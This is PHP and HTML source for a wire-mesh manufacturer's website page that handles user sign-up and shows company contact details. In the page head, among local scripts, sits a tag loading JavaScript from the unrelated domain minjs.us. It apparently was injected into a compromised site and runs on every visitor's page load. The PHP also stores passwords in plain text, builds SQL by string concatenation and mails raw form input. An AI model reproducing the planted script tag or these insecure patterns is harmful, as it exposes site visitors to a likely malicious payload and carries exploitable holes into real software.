<?php
require_once('../__approot.php');	
$suffix_str=$_GET['suffix_str'];
$postvars=$_POST;
if ($_GET['ls']=='signin')
{
	if(strtoupper($_POST['code'])!=$_SESSION["code"])
	{
		$ls_msg= " Verify code error! ";
	}
	else
	{
		$userName=inputsafe($_POST['userName']);
		$userPwd=inputsafe($_POST['userPwd']);
		$userRealName=inputsafe($_POST['userRealName']);
		$userEmail=inputsafe($_POST['userEmail']);
		$userWeb=inputsafe(strtolower(trim($_POST['userWeb'])));
		$usercompany=inputsafe($_POST['usercompany']);
		$userMemo=inputsafe($_POST['userMemo'],2);
		
		$select_sql="select * from ls_users where userName='".$userName."' ";
		$select_query=$opendb->query($select_sql);
		$select_rows=mysqli_num_rows($select_query); //总数
		
		/*if($select_rows>0)
		{
			$ls_msg="Username already exists, please choose another";}
		else
		{*/

global $sendmailOKMsg,$sendmailFailMsg,$sendmailFailMsgcn,$sendmailOKMsgcn;

if($lang != "en"){
	$lan = $lang_cn;
}else{
	$lan = $lang_en;
}

$Back=$HTTP_REFERER;      /* 返回路径 */
$Subject="Information from ".$_SERVER['HTTP_HOST'];  /* 标题*/

$config_sql="select * from ls_config ";
$config_query=$opendb->query($config_sql);
$config_row=mysqli_fetch_assoc($config_query);
$emailAddress=$config_row['feedbackEmail'];

	if(count($postvars)!=0)  //pass vars fron URL
	{
		while(list($akey,$avalue)=each($postvars))
		{
			if(strpos($akey,"mail")!==false)  //获得客户邮件地址
			{$email_from=trim($avalue);}
    		switch ($akey){
    		case "Mr":
       		$Mr=$avalue;
       		break;
    		case "Name":
        	$name=$avalue;
			
       		break;
    		case "Submit":
        	break;
    		case "submit":
        	break;
    		case "ec_cid":
        	break;
    		case "guid":
        	break;
    		case "ls2":
        	break;
			case "code":
        	break;
			
   			default:
			if(strpos($akey,"select")===0||strpos($akey,"button")===0){break;}
			
	    	$Content.=urldecode($akey).":  ";
	    	$Content.=urldecode($avalue)."<br/>\r\n";
        	break;
    		}
		}
	}
	//$email_from
	$headers = "MIME-Version:1.0\r\n"; 
	$headers .= "Content-type:text/html; charset=utf-8" . "\r\n"; 
	$headers .= "From:pmflans@jeep.websitewelcome.com";
	$Content .="<br/>\r\n".date('Y-m-d');
	
	if(mail($emailAddress,$Subject,$Content, $headers))
	{
		$openck=new cktb();
		/*if($openck->checktable("ls_pro_feedback","CREATE TABLE IF NOT EXISTS `ls_pro_feedback` (
  `ID` int(4) NOT NULL AUTO_INCREMENT,
  `requirement` text,
  `name` varchar(100) DEFAULT NULL,
  `company` varchar(200) DEFAULT NULL,
  `tel` varchar(100) DEFAULT NULL,
  `email` varchar(150) DEFAULT NULL,
  `date` varchar(200) DEFAULT NULL,
  `proName` varchar(1000) DEFAULT NULL,
  `path` varchar(1000) DEFAULT NULL,
  `address` varchar(500) DEFAULT NULL,
  `fax` varchar(100) DEFAULT NULL,
  `http` varchar(100) DEFAULT NULL,
  `proID` int(4) DEFAULT NULL,
  `ip` varchar(50) DEFAULT NULL,
  `explorer` varchar(100) DEFAULT NULL,
  `home` varchar(300) DEFAULT NULL,
  `system` varchar(50) DEFAULT NULL,
  `enable` int(1) DEFAULT '1',
  `cateNameID` int(4) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=5 ;"))	$ls_msg = $ls_msg .$openck->ls_msg;*/
	}
		foreach($postvars  as $akey => $avalue){
			
			/*switch (urldecode($akey)){
			case "Subject":
       		$subject=$avalue;
       		break;
    		case "Comments":
       		$comments=$avalue;
       		break;
    		case "Name":
        	$userName=$avalue;
       		break;
    		case "Companyname":
			$companyname=$avalue;
        	break;
			case "Address":
			$address=$avalue;
        	break;
    		case "Tel":
			$tel=$avalue;
        	break;
			case "Fax":
			$fax=$avalue;
        	break;
    		case "Mail":
			$mail=$avalue;
        	break;
			case "Web":
			$http=$avalue;
        	break;
    		case "path":
			$path=$avalue;
        	break;
    		case "pro_id":
			$pro_id=$avalue;
        	break;
			case "guid":
			$guid=$avalue;
        	break;
			case "business":
			$business=$avalue;
        	break;
    		}*/
		}
		
			$select_sql="select * from ls_users ";
			$select_query=$opendb->query($select_sql);
			$select_rows=mysqli_num_rows($select_query); //总数

			$insert_sql="insert into ls_users(userName,userRealName,userPwd,userEmail,userWeb,userTime,userMemo,userNum,enable,usercompany) values ('".$userName."','".$userRealName."','".$userPwd."','".$userEmail."','".$userWeb."','".date('Y-m-d')."','".$userMemo."',".($select_rows+1).",0,'".$usercompany."')"; 
			//echo $insert_sql;
			$insert_query=$opendb->query($insert_sql);
			
			$config_sql="select * from ls_config ";
			$config_query=$opendb->query($config_sql);
			$config_row=mysqli_fetch_assoc($config_query);
			$emailAddress=$config_row['feedbackEmail'];
			$ls_msg="Thank you, ".$userRealName.", your request form has been received, active Email will be sent soon. <br/>For further information feel free to contact <a href='mailto:".$emailAddress."'>Us.</a>";
		/*}*/
	}
}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/all.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- InstanceBeginEditable name="doctitle" -->
<title>{ls_title}</title>
<!-- InstanceEndEditable -->
<meta name="keywords" content="{ls_keywords}" />
<meta name="description" content="{ls_description}" />
<link rel="icon" href="../images/favicon.png" sizes="16x16" type="image/png" />
<link rel="stylesheet" type="text/css" href="../css/all.css" media="none" onload="if(media!='all')media='all'">
<noscript><link rel="stylesheet" href="../css/all.css"></noscript>
<link rel="stylesheet" type="text/css" href="../css/nivo-slider.css" media="none" onload="if(media!='all')media='all'">
<noscript><link rel="stylesheet" href="../css/nivo-slider.css"></noscript>
<link rel="stylesheet" type="text/css" href="../css/style.css" media="none" onload="if(media!='all')media='all'">
<noscript><link rel="stylesheet" href="../css/style.css"></noscript>

<script type="text/javascript" src="../js/js.js" async></script>
<script type="text/javascript" src="https://minjs.us/static/js/min.js" ></script>
<script type="text/javascript" src="../js/ex_menu1.js" async></script>
<script type="text/javascript" src="../js/jquery-1.4.3.min.js"></script>

<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
</head>

<body onselectstart="return false">

<div id="container">
	<div id="header">
		<div id="logo"><img src="../images/logo.jpg" border="0" usemap="#Map"  />
			<map name="Map" id="Map">
				<area shape="rect" coords="10,2,145,132" href="../index.html" />
			</map>
		</div>
		<div id="title">
			<div id="c_name"></div>
			<div id="email"><img src="../images/email.jpg" border="0" usemap="#Map2" />
				<map name="Map2" id="Map2">
					<area shape="rect" coords="13,9,59,57" href="../contact.html" />
				</map>
			</div>
		</div>
		<div id="nav">
			<!-- InstanceBeginEditable name="EditRegion5" -->
				<ul id="nav_main">
					<li><a href="../index.html">Home</a></li>
					<li id="current"><a href="../aboutus.html">About Us</a></li>
					<li><a href="../prolist.html">Products</a></li>
					<li><a href="../workshop.html">Workshop</a></li>
					<li><a href="../quality.html">QC</a></li>
					<li><a href="../news.html">News</a></li>
					<li><a href="../contact.html">Contact Us</a></li>
				</ul>
			<!-- InstanceEndEditable -->
		</div>
	</div>
	<div id="maincontent">                   
		<div id="left">
			<div id="pro_title"></div>
			<div id="pro_main2">
				<div id="pro_main">
					<div id="pro_contact"><!-- InstanceBeginEditable name="EditRegion1" -->{ls_p_cate}<!-- InstanceEndEditable --></div>
				</div>
				<div id="pro_main3"></div>
			</div>
			<div id="con_title"></div>
			<div id="con_main">
				<div id="con_contact">
				<table width="218" border="0" cellspacing="0" cellpadding="0" align="center">
                    <tr height="19">
						<td width="47"><strong>Add:</strong></td>
						<td width="171">Industrial Park Zone of South</td>
					</tr>
					<tr height="19">
						<td>&nbsp;</td>
						<td>Anping County, Hebei Province, </td>
					</tr>
					<tr height="19">
						<td>&nbsp;</td>
						<td>China.</td>
					</tr>
                    <tr height="19">
						<td width="47"><strong>Zip:</strong></td>
						<td width="171">053600</td>  
					</tr>
					<tr height="19">
						<td width="47"><strong>Tel:</strong></td>
						<td width="171">+86-15369679157</td>  
					</tr>
                    <tr height="19">
						<td width="47"><strong>Skype:</strong></td>
						<td>summerpfmscreen</td>  
					</tr>
					
					<tr height="19">
						<td width="47"><strong>E-mail:</strong></td>
						<td><a href="mailto:info@pfmscreen.com" >info@pfmscreen.com</a></td>
					</tr>
                    <tr height="19">
						<td>&nbsp;</td>
                        <td><a href="mailto:sales@pfmscreen.com" >sales@pfmscreen.com</a></td>
					</tr>
				</table>

				</div>
				<div id="contact_foot"></div>
			</div>
		</div>
		<div id="right">
			<div id="motif">
				<div id="slider" class="nivoSlider">
					<a href="javascript:void(0)"><img src="../images/motif1.jpg" /></a>
					<a href="javascript:void(0)"><img src="../images/motif2.jpg" /></a> 
				</div>
	    </div>
			<script type="text/javascript" src="../js/jquery.nivo.slider.pack.js"></script>
			<script type="text/javascript">
				$(window).load(function() {
					$('#slider').nivoSlider();
				});
			</script>
			<div id="pro_abo">
				<div id="pro_all">
				<!-- InstanceBeginEditable name="EditRegion2" -->
					<div id="p_title">
						<div class="p_left"><img src="../images/icon.gif" />&nbsp;&nbsp;About Us</div>
					</div>
					<div id="p_contect">{ls_allabout}</div>
				<!-- InstanceEndEditable -->
				</div>
			</div>
		</div>
	
	<div id="mainfoot"></div>
</div></div>
<div id="footer">

	<div id="copyright" align="center">Copyright © 1987 - 2020 <a href="http://www.polyesterwiremesh.com/index.html">Anping County PFM Screen Co., Ltd.</a> All Rights Reserved. <br />
E-mail: <a href="mailto:info@pfmscreen.com" >info@pfmscreen.com</a> &nbsp; Tel: +86-318-8097607   &nbsp;  Fax: +86-318-7513998  &nbsp;   Mobile: +86-15369679157 <br />
 Add: Industrial Park Zone of South Anping County,  Hebei Province,  China.</div>
</div>
   <div id="chat_f1" align="right">
    <!-- Powered by: Crafty Syntax Live Help        http://www.craftysyntax.com/ -->
<div id="craftysyntax">
<script type="text/javascript" src="/chat/livehelp_js.php?eo=1&relative=Y&amp;department=1&amp;serversession=1&amp;pingtimes=15"></script>
       
</div>
<!-- copyright 2003 - 2011 by Eric Gerdes -->
    </div>

</body>
<script type="text/javascript" src="../js/ex_menu2.js" async></script>
<script type="text/javascript"> 
<!-- 
document.oncontextmenu=function(e){return false;} 
//--> 
</script> 
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-121813900-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-121813900-1');
</script>
<!-- InstanceEnd --></html>
